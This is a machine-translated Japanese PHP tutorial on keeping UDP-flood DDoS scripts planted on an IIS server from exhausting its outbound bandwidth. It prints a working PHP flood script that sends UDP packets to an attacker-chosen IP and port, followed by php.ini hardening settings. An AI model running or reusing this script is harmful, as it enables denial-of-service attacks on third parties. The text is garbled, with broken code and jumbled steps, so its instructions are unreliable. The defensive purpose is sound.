php ddos​​ がネットワーク帯域幅とサーバーリソースを占有することを防ぐ iis の解決策_PHP チュートリアル

PHP コードを使用してソケットを呼び出し、サーバーのネットワークを直接使用して他の IP を攻撃する 以前に Apache でこの問題に遭遇しました。今日は、PHP DDos が IIS のネットワーク帯域幅とサーバー リソースを占有するのを防ぐ方法について説明します。

php ddos​​ の一般的なコードは次のとおりです:

解決策:

コードは次のとおりです

コードをコピーします

$packets = 0; $ip = $_GET['ip']; rand = $_GET['port' ]; ignore_user_abort(FALSE); $exec_time = $_GET['time']; $time = time();ポート $rand " ; $max_time = $time+$exec_time; for($i=0;$i$out .= "X"; } while (1){ $packets++; if(time() > $max_time){ break } $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5); if($fp ){ fwrite($fp, $out); } } echo ".time('h:i:s') " with $packets (" .round (($packets*65)/1024, 2) . " mB) パケット平均 ".round($packets/$exec_time, 2) " packets/s n"; パフォーマンス特性: IIS がオンになるとすぐに、サーバーの送信帯域幅が使い果たされます。つまり、サーバーは他のサーバーにパケットを送信し続けます。この状況は、攻撃を受ける場合とは異なります。 DDOS。DDOS は大量のデータ パケットを受信し続けます。

c:windowsphp.ini の値を Off に設定します

コードは次のとおりです

コードをコピーします

および:コードは次のとおりです

allow_url_fopen =オフ

コードをコピーします

「;」という意味です。

;extension=php_sockets.dll
の使用を制限するには:

コードは次のとおりです

コードをコピーします

前にある「;」記号を削除します 上記の方法がまだ機能しない場合は、IIS での PHP 拡張機能のテストと許可された拡張機能を無効にすることができます。

;ignore_user_abort = On
の その後、IIS を再起動します

注: サーバーがメカニズムを実行したくない場合は、php を閉じることができます。必要に応じて、php_sockets.dll を無効にすることもできます。80 などの重要なポートが開いている限り、すべての udp ポートをブロックすることもできます。

http://www.bkjia.com/PHPjc/444702.htmlwww.bkjia.com
tru​​e

http://www.bkjia.com/PHPjc/444702.html技術記事 PHP コードを使用してソケットを呼び出し、サーバーのネットワークを直接使用して他の IP を攻撃します。私は以前に Apache でこの問題に遭遇しました。今日は php Ddos が IIS のネットワーク帯域幅を占有するのを防ぐ方法について説明します。